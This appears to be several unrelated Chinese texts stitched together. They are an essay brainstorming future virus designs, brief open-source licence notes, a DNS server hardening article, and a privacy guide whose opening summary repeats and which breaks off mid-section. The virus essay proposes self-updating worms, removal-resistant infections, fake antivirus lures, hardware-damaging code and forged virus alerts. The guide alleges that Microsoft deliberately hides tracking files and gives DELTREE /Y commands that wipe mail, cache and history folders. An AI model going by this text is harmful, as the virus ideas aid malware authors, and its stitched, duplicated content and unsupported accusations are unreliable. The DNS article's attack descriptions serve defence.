chilly

病毒技术日新月异，反毒公司疲于应付，不过也可以估计一下发展方向，制定好“5年计划”。不了解矛的特点就不能制造出好的盾。矛有多种：直矛、弯矛，独矛、多矛，尖矛、钝矛……同样，盾有多种：平盾、凸盾、凹盾、三角盾……
凭 着对网络的第六感，我对病毒的发展方向做了一下估想。说明一下，我什么技术都不会，编程也全部忘记了。所以下面的设想可能在技术上很难实现。不过我一直认 为创意先于技术。你可以把下面的话看做是在说梦话，反正人生如梦。本人不对有人用下面创意搞破坏负责。因为这正如网络安全知识：是矛也是盾。
浩写于2004.2.16～3.10首发于浩的个人网站：www.caiyihao.com,转载请保留作者信息，谢谢！

由于现在已经是网络普及，是蠕虫才扩散速度快，所以下面谈论的基本都是网络蠕虫病毒。

一、 自动升级病毒：杀毒软件有自动升级功能，呵呵，病毒就不可以有么，升级的好处：1.病毒作者可根据病毒蔓延情况，抢先在杀毒软件前更新病毒。2.而且，可 以随时改变攻击对象，例如DOS拒绝服务攻击网站的对象，现在的病毒基本都是一次写就攻击对象的，如为微软网站。如果可以改变DOS拒绝服务对象，那么对 方网站基本难以事先准备。3.可以对编码出错处修改和优化代码。4.升级病毒能避免高版本病毒要再放出来再感染多一次机器。这样的话避免相同工作，传播速 度更快。
升级方式：1.特定网站放文件升级，病毒自动下载文件升级。这样很容易病毒网站流量太大瘫痪，实际上就是DOS攻击了，不太实际。
2.特定网页升级，通过读出网页里面特定位置的代码，把它下到自身病毒用本身的引擎进行升级，流量问题和上面差不多。
3.版本不同升级，高版本病毒通过开后门，在机器留一个文件，甚至一个网页，低版本病毒通过扫描，发现另外一部机器有高版本病毒，马上到那里得到升级代码或文件。升级后病毒在自己机器也放一个升级文件。这样的话速度很快的，所以所有病毒很快全部升级。
4.e-mail 升级，和上面相类似，只不过现在用自己带或者是系统带的mail引擎系统收发升级代码或文件。

二、系统还原病毒：就是和现在的系统还原软件一样道理，感染后，你杀了以后重新开机又复了中毒时候的状态。缺点是现在的系统还原软件体积很大，可以考虑把系统还原软件减去一些功能，例如，保护病毒本身就可以，或者几个重要文件夹就可以，同时不让杀毒软件更新。

三、像杀毒软件的病毒：表面看是杀毒软件，实际上不是，可以从图标方面入手，或者是双后缀名入手。

四、专门杀杀毒软件的病毒：我想将来病毒应该并非像现在的进程、特征码、文件杀杀毒软件。而应该是特征行为杀，杀病毒可以从特征行为杀，倒过来杀杀毒软件也可以。或者是杀毒软件的特征码杀，呵呵。

五、 破坏硬件的病毒：其实即使是CIH也是应该叫破坏软件。现在主板都可以在系统环境下刷新了，可以考虑软件控制bios的设置，让某些设置不合理，严重损耗 硬件。也可以通过严重数字计算使CPU产生热量，或者提高刷新频率破坏显卡和显示器，或者不停狂读写硬盘某区损坏硬盘和磁头，或者是突然提高声音音量震坏 音箱。

六、寄生病毒：生物世界有寄生病毒，电脑世界也可以。寄生病毒的特点是寄生在已经广泛传播感染了机器的病毒上，这样传播速度很快。多、快、好、省。
本文由caiyihao（浩）写，由于以前我的文章给人家转载过程有时删除掉一些内容，所以完整内容和后继修改请访问浩的个人网站：www.caiyihao.com

七、权限病毒：与杀毒软件争权限，把杀毒软件权限降低，自己权限提升。

八、手机病毒泛滥：现在都有一些手机病毒了，将来应该可以有病毒狂发短信、狂定业务、刷手机bios，烧主板、狂打电话、列黑名单让好友打不进来、或者是打了一段时间就断。或者变声变调，男人声音变成女人声音。

九、恶意病毒：以阻塞网络、产生垃圾消息等网络流氓行为为目的。或者是突然出现一个鬼叫大声吓死心脏病人，没有心脏病也给它吓出心脏病来的这么一类。

十、假冒病毒公告：最近的病毒都能假冒e－mail的系统退信骗过用户。最近很多e－mail的系统都有发e－mail给用户提示最新病毒情况。可以假冒。病毒设计本来就应该结合社会工程学。和社会工程学结合才传播速度快，人是社会的人，不能脱离社会。
……（内心极烦闷，无心思再写，见谅）
对病毒公司的一些个人看法：
虽然以前人家说有一些病毒是病毒公司特意写了放出来，我不同意这个说法，其实真正有大危害的是都只是那几个出名病毒，这些病毒理论上应该不是什么公司写的，而是个人。现在公司的拦截也快，这个公司和另外公司对同一个病毒拦截一般也不超过几个小时。
我 想国内的病毒公司应该多在公益方面下功夫，不要只是注意到钱，看看外国那些大的安全公司，一般有流量实时图。一个病毒公司的定位固然不能不考虑到钱，但什 么都绕钱转不行，互联网的开放、自由性那么强，公司力量再大也有限，不如个人共同结合起来大。正如如果一个医生看病想着赚药费，不会成为一个好医生。
我 想没有必要把一个病毒说的天花乱坠，就好像以前的CIH病毒一样，宣传的人人都怕，这样公司就可以多卖软件。如果说一个删除硬盘的可执行文件都可以叫病 毒，那么基本人人都可以写病毒。不是严重的就让它不那么吓人吧。病毒公司应该是在培养人养成良好防毒工作的宣传上面下功夫。
我记得我两年前和*山杀毒公司的一个软件设计员QQ聊天过，他说他们公司写那个杀毒软件才六个人。很难想象一个销量这么大的软件可以这么少人来写，不说bug，单单是思维，人多比人少考虑的问题多吧。
……（内心极烦闷，无心思再写，见谅）
浩写于2004.2.16～3.10首发于浩的个人网站：www.caiyihao.com,转载请保留作者信息，谢谢！

　 GPL：如果使用他人的遵循GPL协议的软件集成到你自己的软件中，你自己的软件自动遵循GPL协议，必须允许任何人免费使用你的软件。对于你自己的程序源代码，你可以免费散发，也可以收取一定的费用。

LGPL：主要用于一些库函数，设计它的初衷是想让它可以被一些商业软件所使用，扩大它的应用范围。可以设计使用遵循LGPL协议的函数的软件，只要在发布的时候不同时带上这个函数，设计的软件就不必强迫遵循LGPL协议（用于商业用途）。

Apache Software License：你可以任意使用遵循apache协议的软件，只要你在软件中含有如下文字： "This product includes software developed by the Apache Software Foundation <http://www.apache.org/>." 。换句话说，只要你对Apache说声谢谢，你就可以随便使用它的软件了，甚至是开发你自己的软件然后卖给Apache（^_^）。

　Internet上的域名服务器安全

作者：cjj < mailto: cjj7513@hotmail.com >
日期：2000-11-04

1 前言
    域名服务器在internet上具有举足轻重的作用，它负责在域名和IP地址进行转换。我们通常在互联网上使用的都是域名，比如首都在线的主页为 www.263.net，而计算机在通信时使用的是其对应的IP地址：202.96.44.130。因此我们可以想象，如果负责域名转换的域名服务器出来 问题，那么将直接导致互联网用户无法使用域名来访问互联网，除非用户能够记住大量的IP地址。由于域名服务器的重要作用，这些服务器往往具有较高的系统配 置，且一般位于高速的骨干网络上，以便快速响应大负荷的查询请求；另外，由于域名服务系统的分布性和开放性，其往往裸露在防火墙的外面。域名服务器的这些 特征使其成为黑客进行攻击的优选目标。
    随着我国互联网的快速发展，越来越多的政府部门、企业、公司、教育机构接入internet，他们要么建立自己的DNS服务器，要么使用ISP提供的DNS服务器，保证这些DNS服务器的安全运行成为一个突出的课题。

2 DNS基本原理
    域名服务系统的发展和internet的发展和演变密切相关，在早期的internet前身—ARPAnet时，由于网络规模较小，只有几百台主 机，所以用单一的文件hosts.txt来表示主机名和地址之间的映射，这个文件由斯坦福研究院(SRI)的网络信息中心(NIC)维护，通过ftp对外 发布。随着TCP/IP协议的引入，Internet飞速发展，这种表示域名的方式出现了严重不足：主机名容易冲突、hosts.txt文件经常不一致、 不宜扩展、NIC的网络流量日益增大，经常出现网络瓶颈等。为了解决这些问题，必须使用一个新型的域名服务系统，它必须满足以下要求：分布式数据管理、全 球一致性、消除网络瓶颈、分层结构。根据这些要求，Paul Mochapetris担负起新系统的研究和规划，于1984年发布了阐述域名服务系统的RFC882和RRC883，这两个RFC经过修正后，其版本为 RFC1034、RFC1035，成为新域名服务系统的标准，当前DNS服务器软件的实现都是基于这两个RFC标准。随着internet的发展，一些新 的RFC扩展标准不断提出，并被加入到这些服务器软件中，比如关于DNS安全扩展标准的RFC2535。
    新域名服务系统是一个关于互连网上主机信息的分布式数据库，它将数据按照区域分段，并通过授权委托进行本地管理，使用客户机-服务器模式检索数 据，并且通过复制和缓存机制提供迸发和冗余性能。域名服务系统包含域名服务器和解析器两个部分：域名服务器存储和管理授权区域内的域名数据，提供接口供客 户机检索数据；解析器即客户机，向域名服务器递交查询请求，翻译域名服务器返回的结果并递交给高层应用程序，通常为操作系统提供的库函数之一。为了理解域 名服务系统，必须理解以下的概念：
    域名空间结构是一个反向生长的树，类似UNIX的文件系统：根由“.”表示，域名由“.”分隔，从底到顶，如下图所示：



图一 域名空间
    区域是域名空间的子树，是域内所有主机信息资源的集合，区域可以简称为域。域的表现形式通常为硬盘上的一个文件，域名服务器在启动时将此文件中的 数据读入自己的内存供外部的解析器查询。如果域名服务器负责解析某个域，则这个域称为域名服务器的授权域，域名服务器可同时管理多个授权域。
    上级域可以将子域的管理权委托给子域的管理员，比如域263.net可以将子域game.263.net的管理权委托给子域game.263.net。
    域名服务器分为主域名服务器和辅域名服务器：主域名服务器存贮和管理授权域的数据，辅域名服务器做为主域名服务器的冗余备份，在主域名服务器失效 时替代主域名服务器，以便对外提供不间断的服务，它使用区域传输从主域名服务器同步数据。辅域名服务器作为冗余，可以有多个。
    域名查询采用UDP协议，而区域传输采用TCP协议。
    域名解析过程分为两种方式：递归模式和交互模式，如下图所示：




图二 域名解析过程
    解析器通常向域名服务器发送递归查询请求，如果域名服务器支持递归查询，则域名服务器收到此查询请求后，如果查询对象位于域名服务器的授权域或缓 存中，则域名服务器返回查找成功结果，否则，域名服务器向外部的域名服务器发送此查询请求，最终要么返回给解析器查找成功的结果，要么返回查找失败。解析 器也能向域名服务器发送非递归查询请求，同递归查询一样，如果查询对象位于域名服务器的授权域或缓存中，则域名服务器返回查找成功结果；和递归查询不同的 是，如果查询对象不在域名服务器的授权域或缓存中，但是域名服务器知道其他的域名服务器能够解析这个查询对象，则域名服务器将这个线索返回给解析器，否则 返回查找失败。上图中，域名服务器作为解析器向外部的域名服务器发送非递归查询请求，得到的结果中包含指向其它域名服务器的线索信息。

3 对DNS服务器的威胁
    目前，黑客对DNS服务器的攻击主要有三种方法：地址欺骗、远程漏洞入侵和拒绝服务。
（1）    地址欺骗
地址欺骗攻击利用了RFC标准协议中的某些不完善的地方，达到修改域名指向的目的。如下图所示：



图三 DNS地址欺骗攻击
    黑客控制着一个或多个在internet上正式运行的DNS服务器，黑客可以指定这些服务器负责解析某个区域，比如hacker.net，黑客在 这个区域内加入大量伪造的数据（A记录、NS记录等），然后黑客使用nslookup等DNS查询工具向受害者的DNS服务器发送一个递归查询请求，要求 解析www.hacker.net这个域名信息，因而引诱受害者的DNS服务器去查询黑客的DNS服务器，黑客的DNS服务器在返回的查询结果中包含了那 些事先伪造的数据（这些伪造信息位于DNS的UDP响应包中的附加段部分，即前面所述的线索信息），受害者的DNS服务器在收到查询结果后，把此结果送回 黑客的查询工具，同时将查询结果中的伪造数据进行缓存。假如缓存的伪造数据中含有www.yahoo.comà1.1.1.1这样的地址映射，那么当其它 主机向被攻击的DNS服务器请求www.yahoo.com的地址时，被攻击的DNS服务器查询自己的缓存，然后将1.1.1.1这个错误的地址以非授权 形式返回。同理，黑客通过修改自己的DNS服务器上的数据，可以使被攻击的DNS服务器返回任何错误的地址指向。解决方法参见下一节中的（3）和（4）。
（2）    拒绝服务
    针对DNS服务器的拒绝服务攻击有两种，一种攻击针对DNS服务器软件本身，通常利用BIND软件程序中的漏洞，导致DNS服务器崩溃或拒绝服 务，这种攻击很容易对付，我们只要为BIND软件安装相应的补丁程序或更新软件即可；另一种攻击的目标不是DNS服务器，而是利用DNS服务器作为中间的 “攻击放大器”，去攻击其它intetnet上的主机，导致被攻击主机拒绝服务，这种攻击的原理为：黑客向多个DNS服务器发送大量的查询请求，这些查询 请求数据包中的源IP地址为被攻击主机的IP地址，DNS服务器将大量的查询结果发送给被攻击主机，使被攻击主机所在的网络拥塞或不再对外提供服务。通过 限制查询主机的IP地址可以减轻这种攻击的影响，目前不可能从根本上解决这个问题。
（3）    远程漏洞入侵
    BIND服务器软件的许多版本存在缓冲区溢出漏洞，黑客可以利用这些漏洞远程入侵BIND服务器所在的主机，并以root身份执行任意命令。这种 攻击的危害性比较严重，黑客不仅获得了DNS服务器上所有授权区域内的数据信息，甚至可以直接修改授权区域内的任意数据，同时可以利用这台主机作为攻击其 它机器的“跳板”。关于这些漏洞的详细信息可以查看参考文献中所列的CERT安全建议，解决方法很简单，参考下一节中的（1），更新BIND服务器软件。

4 保护DNS服务器的措施
（1）    使用最新版本的DNS服务器软件
当前，internet上最广泛使用的DNS服务器软件为BIND (Berkeley Internet Name Domain)，它可以运行在各种UNIX平台上，某些版本也支持Windows NT平台。本文以BIND软件为例进行说明，其它DNS服务器软件的设置可能有所不同，但其原理都是一样的，故不一一详述。
    BIND软件是一个免费软件，由互联网软件协会（ISC：Internet Software Consortium）开发和维护。BIND软件分为两个系列：版本4系列和版本8系列。版本4系列是较早的版本，其功能不够强大，含有许多著名的漏洞， 其最后一个版本是4.9.7，互联网软件协会已经宣布不再开发4系列的BIND，以后的开发仅针对于8系列或更高版本的BIND。8系列的BIND相对于 4系列有了很大改进，修正了很多已知的安全漏洞，优化了软件运行效率，提供更加灵活和强大的配置命令，增加了许多RFC建议的安全功能，能够有效的抵抗大 部分的已知攻击手段。因此，互联网软件协会强烈建议使用BIND 8系列中的版本8.2.2+P5，如果无法使用这个版本，那么可以考虑使用BIND 4系列中的版本4.9.7。
    使用最新版本的DNS服务器软件虽然可以解决大部分目前已知的漏洞，但并不意味着DNS服务器的彻底安全，因为随着新漏洞的发现，“最新版本”将成为不安全的旧版本，这时必须使用更新的软件版本或安装相应的补丁程序。
    互联网软件协会的正式网站为 http://www.isc.org ，最新的BIND软件可以从它的ftp服务器上下载：
4.9.7: ftp://ftp.isc.org/isc/bind/src/cur/bind-4/bind-4.9.7-REL.tar.gz
8.2.2+P5: ftp://ftp.isc.org/isc/bind/src/cur/bind-8/bind-src.tar.gz
    （2）关闭递归查询和线索查找功能
    如果可能，关闭BIND服务器的递归查询功能，这将使DNS服务器进入被动模式，即它决不会向外部的DNS发送查询请求，只会回答对自己的授权域 的查询请求，因此不会缓存任何外部的数据，所以不可能遭受地址欺骗攻击。当有合法的解析器使用DNS服务器，或其它合法的DNS服务器将这个DNS服务器 作为传递服务器（forwarder）时，不应关闭递归查询，如果不能关闭递归查询，使用后面所讲的其它方法。
    通常，DNS服务器在返回查询结果时，如果结果中包含NS记录而没有NS记录对应的A记录，那么DNS服务器会去查找这个A记录，这种情况叫线索查找。使用这个功能可能导致欺骗攻击，所以建议关闭这个功能。
    在BIND 8版中，在named.conf中使用如下命令关闭这两个功能：
options     {
recursion no;
fetch-glue no;
};
    在BIND 4版中，在named.boot中使用如下命令关闭这两个功能：
options no-recursion
options no-fetch-glue
    （3）限制对DNS进行查询的IP地址
    对DNS服务器进行的查询请求可以按照来源分为两类：来自外部其它DNS服务器的查询和来自本地网络的主机的查询。DNS服务器之间的查询使用交 互方式（非递归方式），当外部DNS服务器进行查询时，其查询对象为被查询DNS服务器所负责管理的授权区域内的数据；而本地网络主机的查询一般都使用递 归方式，其查询对象既可以是被查询DNS服务器所负责的授权区域内的数据，也可以是外部的非授权区域的数据，如果查询对象是授权区域内的数据，则DNS服 务器直接将内存或缓存中的结果返回给进行查询的主机；如果查询对象是外部的非授权区域的数据，则DNS首先在缓存中进行查询，如果找到匹配的结果则返回给 进行查询的主机，否则将查询请求发送给外部的DNS服务器。
    早期的BIND软件没有限制进行查询的IP地址的功能，internet上的任何主机都可以向你的DNS服务器发送递归或非递归查询请求，而你的 DNS服务器一律都进行回答。这不仅让他人可能滥用你的DNS服务器，而且恶意的黑客可能利用这个功能欺骗你的DNS服务器，比如上一节中所述的地址欺 骗。BIND 8系列的软件加入了限制查询IP这个非常有用的功能，通过在其配置文件named.conf中使用命令allow-query来实现这个功能，例如：
    options    {
            directory    “/var/named”;
            allow-query    202.96.44.0/24;
    };
    zone  “263.net”  In {
            type master;
            file “db.263.net”;
            allow-query { any;};
    };                            
    zone  “capital-online.com.cn”  In {
            type master;
            file “db.capital-online”;
            allow-query { any;};
    };        
    在这个例子中，多次使用了allow-query命令，因为位于zone命令中的allow-query优先级别高于options命令中的 allow-query，所以，此配置允许任何主机查询授权域263.net和capital-online.com.cn，只允许指定网络 202.96.44.0/24上的主机查询外部的非授权域。
（4）    限制对DNS进行递归查询的IP地址
BIND 8.2.1或更高版本允许对进行递归查询的IP地址作出限制，如果递归查询请求来自不允许的IP地址，则BIND服务器软件将此查询以非递归查询对待。
在配置文件中使用allow-recursion命令实现此功能，例如：
options     {
allow-recursion { 206.168.119.176/29; };
};
    （5）限制区域传输
    区域传输一般用于主DNS服务器和辅DNS服务器之间的数据同步，当主DNS服务器对其所管理的授权区域内的数据进行改动后，辅DNS服务器按照 规定的时间间隔使用区域传输从主DNS服务器获取改动后的信息，然后刷新自己相应区域内的数据。利用区域传输功能，还可以获得整个授权区域内的所有主机信 息，而这些正是恶意的黑客所感兴趣的信息，根据这些信息，黑客可以轻松地推测你的网络结构，并从主机的域名信息判断其功能或发现那些防范措施较弱的机器 （比如测试用的机器）。例如：nslookup的ls命令或dig的axfr参数，就是使用区域传输来进行查询，另外还有一些黑客工具，专门使用区域传输 来搜集区域内的主机信息。正常情况下，应该只允许我们信任的辅DNS服务器和主机进行区域传输。不幸的是，BIND软件的缺省设置允许任何人进行区域传 输。因此，必须在配置文件中加以限制。
    对于BIND 8版的软件，在配置文件named.conf中使用命令allow-transfer来限制允许区域传输的主机，例如：    
options    {
            allow-transfer    {
                            192.168.100.1;
                            202.96.44.0/24;
            };
    };
    以上的设置只允许地址为192.168.100.1和位于网段202.96.44.0/24内的主机进行区域传输。
    对于BIND 4版的软件，在配置文件named.boot中使用命令xfernet来限制允许区域传输的主机，例如：
    xfrnets    192.168.100.1&255.255.255.255    202.96.44.0&255.255.255.0
    注意两种版本之间的命令区别。另外要注意的是，必须同时在主DNS服务器和辅DNS服务器进行限制。
    （6）限制对BIND软件的版本信息进行查询
    黑客为了利用特定版本BIND软件的漏洞，首先需要确定BIND软件的版本号，缺省情况下，BIND服 务器软件不限制对自身版本号的查询，所以任何人可以很容易的获取BIND软件的版本号。例如，使用dig工具的如下命令即可得到BIND的版本号：
    dig @dns.example.com version.bind chaos txt
在nslookup的交互窗口中，依次输入set type=txt;set class=chaos;version.bind同样可以得到BIND的版本号。
在BIND 8版本中，有两种方法解决这个问题，一种是在named.conf中使用version命令修改版本号，例如：
options    {
        version  “hello1.1.1”;
};
另外一种方法是在named.conf中加入以下的语句，只允许信任的主机查询版本号：
zone "bind" chaos {
            type master;
            file " bind";
            allow-query {
                 信任主机的IP地址;
            };
};
然后，建立一个如下的授权区域文件：
    $ORIGIN bind.
     @        1D CHAOS SOA    localhost. root.localhost. (
                    1            ; serial
                    3H            ; refresh
                    1H            ; retry
                    1W            ; expiry
                    1D )        ; minimum
    CHAOS NS        localhost.
     ; EOF
    需要注意的是，以上使用IP地址进行访问控制时，必须能够有效地防止IP地址欺骗。为了防止IP欺骗， 至少应该在边界路由器上进行如下设置：如果从外部进入网络的IP包的源地址是我们内部网络的IP地址，那么必须丢弃这些数据包。

5 结束语
    总之，为了保证DNS服务器的安全运行，不仅要使用可靠的服务器软件版本，而且要对DNS服务器进行正确的的配置，同时还要跟踪服务器软件和操作系统的各种漏洞，及时为发现的漏洞打补丁或进行升级。

参考文献：
1. Mockapetris, P.,“Domain Names - Concepts and Facilities”, STD 13, RFC 1034, November 1987.
2. Mockapetris,P.,“Domain names - implementation and specification”， STD 13, RFC1035， November 1987。
3. Eastlake, D. and C. Kaufman,“Domain Name System Security Extensions”, RFC 2535, March 1999.
4. Cricket Liu & Paul Albitz，“DNS and BIND（Third Edition）”，O'Reilly & Associates， September 1998.
5. Cricket Liu ，“Securing an Internet Name Server”，Acme Byte & Wire LLC，1999.
6. CERT Advisory CA-97.22，“BIND - the Berkeley Internet Name Daemon”， May 26, 1998
7. CERT Advisory CA-98.05，“Multiple Vulnerabilities in BIND”， November 16, 1998.
8. CERT Advisory CA-99-14，“Multiple Vulnerabilities in BIND”，November 10, 1999
9. AL-1999.004-AUSCERT ALERT，“Denial of Service (DoS) attacks using the Domain Name System (DNS)”，13 August 1999

　　　我知道已经有人开始意识到我所提的这些方面.但是我确信绝大部分的人不知道这一切.这篇指南的目的是告诉大家微软的产品究竟干了些什么以及如何从微软的手中重新获得我们自己的隐私权.感谢阅读此文.

声明:
　　作者(译者)不对任何由读者自己造成或者由于其他原因造成的损失和信息丢失负责.

概要:
　 　在你的计算机里有很多微软试图隐藏的文件目录.在这些目录中你会(主要)发现有这样两种东西:Microsoft Internet Explorer记录了你所访问过的所有站点---即使你已经清空了你的缓存,Microsoft Outlook和Microsoft Outlook Express记录了你所有的E-MAIL信息--即使你已经从垃圾箱中把他们清除(其中也包括来往信件中的附件).请相信我,我所说的还不到实际的 50%.
　　我之所以说这些文件都隐藏得很好,是因为他们确实隐藏得非常好.以至于如果你没有什么DOS的知识,那你就不可能找到这些东西. 我之所以这么说是因为其中有些文件只能在DOS或只能在Windows Explorer里显示.还有些文件在DOS和Windows里都不能显示,但是可以通过一个特定的工作环境来显示他们.基本上以下我所提到的东西如果你 并不事先知道他们的存在,那么在日常的使用过程中遇到他们的机会是微乎其微的.
　　为了向你们展示这些隐藏的文件是多么的卑鄙,我举个简单的例 子,其中有三个隐藏的文件夹包括了:你的姓名,地址,电话号码,你所访问过的网站,你所发出或 接受到的每一封E-MAIL,你所发出或接受到的每一个附件,你通过搜索引擎所查找的每一个关键字,你所下载的每一个文件名,包含有"敏感"信息的文档 名,你的所有Cookies的副本,来自你的HOTMAIL账户的完全可读的E-MAIL,你的PGP密匙,还有更多...
　　有趣的是以上的所有在microsoft的官方网站上却只字未提.

声明:
　　作者(译者)不对任何由读者自己造成或者由于其他原因造成的损失和信息丢失负责.

概要:
　 　在你的计算机里有很多微软试图隐藏的文件目录.在这些目录中你会(主要)发现有这样两种东西:Microsoft Internet Explorer记录了你所访问过的所有站点---即使你已经清空了你的缓存,Microsoft Outlook和Microsoft Outlook Express记录了你所有的E-MAIL信息--即使你已经从垃圾箱中把他们清除(其中也包括来往信件中的附件).请相信我,我所说的还不到实际的 50%.
　　我之所以说这些文件都隐藏得很好,是因为他们确实隐藏得非常好.以至于如果你没有什么DOS的知识,那你就不可能找到这些东西. 我之所以这么说是因为其中有些文件只能在DOS或只能在Windows Explorer里显示.还有些文件在DOS和Windows里都不能显示,但是可以通过一个特定的工作环境来显示他们.基本上以下我所提到的东西如果你 并不事先知道他们的存在,那么在日常的使用过程中遇到他们的机会是微乎其微的.
　　为了向你们展示这些隐藏的文件是多么的卑鄙,我举个简单的例 子,其中有三个隐藏的文件夹包括了:你的姓名,地址,电话号码,你所访问过的网站,你所发出或 接受到的每一封E-MAIL,你所发出或接受到的每一个附件,你通过搜索引擎所查找的每一个关键字,你所下载的每一个文件名,包含有"敏感"信息的文档 名,你的所有Cookies的副本,来自你的HOTMAIL账户的完全可读的E-MAIL,你的PGP密匙,还有更多...
　　有趣的是以上的所有在microsoft的官方网站上却只字未提.

索引:
1.定义和缩写
2.你为什么要删除这些文件
3.如何尽快的删除这些文件(推荐给非专业人士)
　　3.1如果你使用Microsoft Internet Explorer
　　3.2清理你的注册表
　　3.3如果你使用Microsoft Outlook Express
　　3.4彻底删除文件
　　3.5继续使用Microsoft Internet Explorer(强烈不推荐)
4.逐步带你走近这些隐藏的文件(推荐给专业人士)
5.看看OUTLOOK的真正面目
6.微软是如何做到这些的
7.+s代表隐秘而不是系统
8.FIND FAST的真正面目
　　8.1删除FIND FAST
9.看看微软为了防止人们发现这些隐藏的文件而尽了多大的努力
10.最终注解和联系方式
　　10.1推荐阅读
11.特别鸣谢
12.参考联接
--------------------------------------------------------------------------------
1.定义和缩写
　　我所提出的最好的定义就是以下这个:
I)所谓的"深度隐藏"的文件/文件夹就是在你选择了"显示所有文件"选项的时候依然不能被Windows Explorer所显示,也不能在MS-DOS列文件目录时被显示,同样不能通过"查找"来找到的这样的文件/文件夹.
　　a)必须通过最少一个工作环境来使Explorer可以显示他们(深度隐藏文件/文件夹)
　　b)必须通过最少一个工作环境来使MS-DOS可以显示他们(深度隐藏文件/文件夹)
　　c)必须通过最少一个工作环境来使"查找"可以找到他们(深度隐藏文件/文件夹)
　　d)他们是被蓄意隐藏的.
II)要把"深度隐藏"的文件/文件夹同简单的加上h(隐藏属性)的文件/文件夹(如MS DOS.SYS或SYSBCKUP文件夹)区分开来.
III)要把"深度隐藏"的文件/文件夹同"其他"的一些故意隐藏的文件(如一个文件名为????x￥.的文件)区分开来.
DOS = 磁盘操作系统
MSIE = Microsoft Internet Explorer
TIF = Temporary Internet Files (folder) (临时Internet文件/文件夹)
HD = 硬盘
OS = 操作系统
--------------------------------------------------------------------------------
2.我为什么要删除这些文件?
1)因为这明显涉及到你的隐私安全问题
2)因为微软是蓄意的要保留这些记录(至于原因,我只能进行猜测)
3)因为这些文件占用了大量的磁盘空间,我曾经发现一台计算机里有200兆的空间被这样的文件所占用,这下你可以明白究竟是什么使你的计算机越来越慢了.在按照以下的措施进行过以后你可能会发现你的计算机的性能得到了巨大的提升.
--------------------------------------------------------------------------------
3.如何尽快的删除这些文件
　　这部分将逐步地讲述如何尽快的删除这些文件.这个部分推荐给非专业人士.而进一步的研究将在第4部分中讨论,请注意以下的步骤将删除你的所有缓存文件,所有cookie文件,所有E-MAIL信息.如果你正在使用MSIE的脱机浏览功能的话,这些脱机文件也将被删除.
--------------------------------------------------------------------------------
3.1如果你使用Microsoft Internet Explorer
1)先关闭你的计算机,再重新开机.
2)在你的计算机开机过程中按F8键直到你看见一个选择菜单
3)选择"命令行模式"(这将使你进入实DOS模式)
4)在你的计算机启动完毕后你将看见C:>_,然后输入以下的命令在每行的结尾按"回车"键
CD\WINDOWS\TEMPOR~1
DELTREE/Y CONTENT.IE5


　　如果以上的命令无效,则输入以下命令
CD\WINDOWS\APPLIC~1\TEMPOR~1
DELTREE/Y CONTENT.IE5


　　如果以上的命令仍然无效,则输入以下命令
CD\WINDOWS\LOCALS~1\TEMPOR~1
DELTREE/Y CONTENT.IE5


　　如果你确信你使用的是MSIE,且上面的步骤都无效,那么请发E-MAIL给我.找到这个文件夹的位置是我的任务,我对于MSIE爱把自己的缓存藏在什么地方非常感兴趣.我知道更低版本的MSIE通常把缓存放在"C:\WINDOWS\CONTENT"内.
5)这个通常会花费一个相当长的时间来完成上面的删除.删除的时间越长,微软记录的你的个人信息就越多.上面的操作完成后,再进行以下操作:
CD\
DELTREE/Y TEMP
DELTREE/Y WIN386.SWP
CD\WINDOWS
DELTREE/Y COOKIES
DELTREE/Y TEMP
DELTREE/Y WIN386.SWP
DELTREE/Y HISTORY


--------------------------------------------------------------------------------
3.2清理你的注册表
　　重启你的计算机,等待WINDOWS装载完毕
1)进入DOS("开始">"所有程序">"命令提示符(MS-DOS Prompt)"在命令行敲入以下命令:
regedit


2)这时会显示注册表编辑器,选择"编辑">"查找".
3)输入"TypedURLs"然后点"查找下一个".你将会被带到一个你所手工输入的所有联接的地方.
4)删除你所找到的所有联接.不要删除文件夹(如"01","02","03"等),在找到的键值上双击以确认他们确实是联接,我所找到的我的键值如下:
HKEY_USERS/Default/Software/Microsoft/Internet Explorer/TypedURLs/
HKEY_CURRENT_USER/Software/Microsoft/Internet Explorer/TypedURLs/


5)在注册表编辑器里你找到这个键值:
HKEY_LOCAL_MACHINE/Software/Microsoft/Windows/CurrentVersion
/Explorer/RemoteComputer/NameSpace/{d6277990-4c6a-11cf-8d87-00aa0060f5b5}


6)删除键值{d6277990-4c6a-11cf-8d87-00aa0060f5b5}这会使你的"查找:文件或文件夹"程序运行更加快速.
--------------------------------------------------------------------------------
3.3如果你安装了OUTLOOK或OUTLOOK EXPRESS
1)安装一个第三方的E-MAIL管理程序如:Eudora或者Pegasus Mail.(译者注:中国人推荐使用FOXMAIL)并且确保安装正确完成.
2)备份你所想要保存的所有E-MAIL(打印出来,或者把他们发送到其他的电子邮箱)
3)卸载OUTLOOK
　　警告: 按照上面的步骤就不会损失你的任何E-MAIL信息,再次核对后返回命令行(DOS prompt),继续输入以下命令:
dir *.mbx /s/p
dir *.mbx /s/p/ah


　　你将会看到如下的文件:
INBOX.MBX
OUTBOX.MBX
SENTIT~1.MBX
DELETE~1.MBX
DRAFTS.MBX


　　如果显示了这些文件,这些文件必然存在于以下的这些目录中的任何一个:
C:\WINDOWS\APPLICATION DATA\MICROSOFT\OUTLOOK EXPRESS\MAIL
C:\PROGRAM FILES\INTERNET MAIL或NEWS\%USER%\MAIL


　　(如果这些.mbx文件存在于其他的位置,那么你最好不好删除他们,因为这些文件不是来自OUTLOOK的.如果你确定他们确实同样来自OUTLOOK,请发E-MAIL给我.)
　 　接下来输入以下命令中的一组(取决于你的.mbx文件的位置).记住,这会删除你的所有E-MAIL信息,所以如果你想要保留你的E-MAIL信息请事 先打印出来或转发至其他的电子邮箱.此时你可以使用你已经安装的Eudora或Pegasus Mail(译者注:FOXMAIL).
CD\WINDOWS\APPLIC~1\MICROS~1\OUTLOO~1
DELTREE/Y MAIL


　　或
CD\PROGRA~1\INTERN~1\%USER% (用你的用户名来替换%USER%)
DELTREE/Y MAIL


--------------------------------------------------------------------------------
3.4彻底删除你的文件
　 　也许你早就知道,删除文件只是删除指向这个文件的索引. 事实上你所删除的文件依然存在于你的硬盘上, 任何人都可以很轻松的恢复他. BCWipe是一个用来彻底删除文件的很好的程序. 如果你使用DOS, FileDust是一个曾在ZDNET上获得5星的可以完成这个任务的很好的程序. 如果你使用PGP,那在PGPtools里你会发现有一个"Freespace Wipe"的选项. Norton Utilities里也包括了一个很好的彻底删除文件的程序. 你也可以通过拥有30天的试用期来使用Evidence Eliminator, 这可能是确保你的隐私的最好的程序了.
--------------------------------------------------------------------------------
3.5继续使用Microsoft Internet Explorer
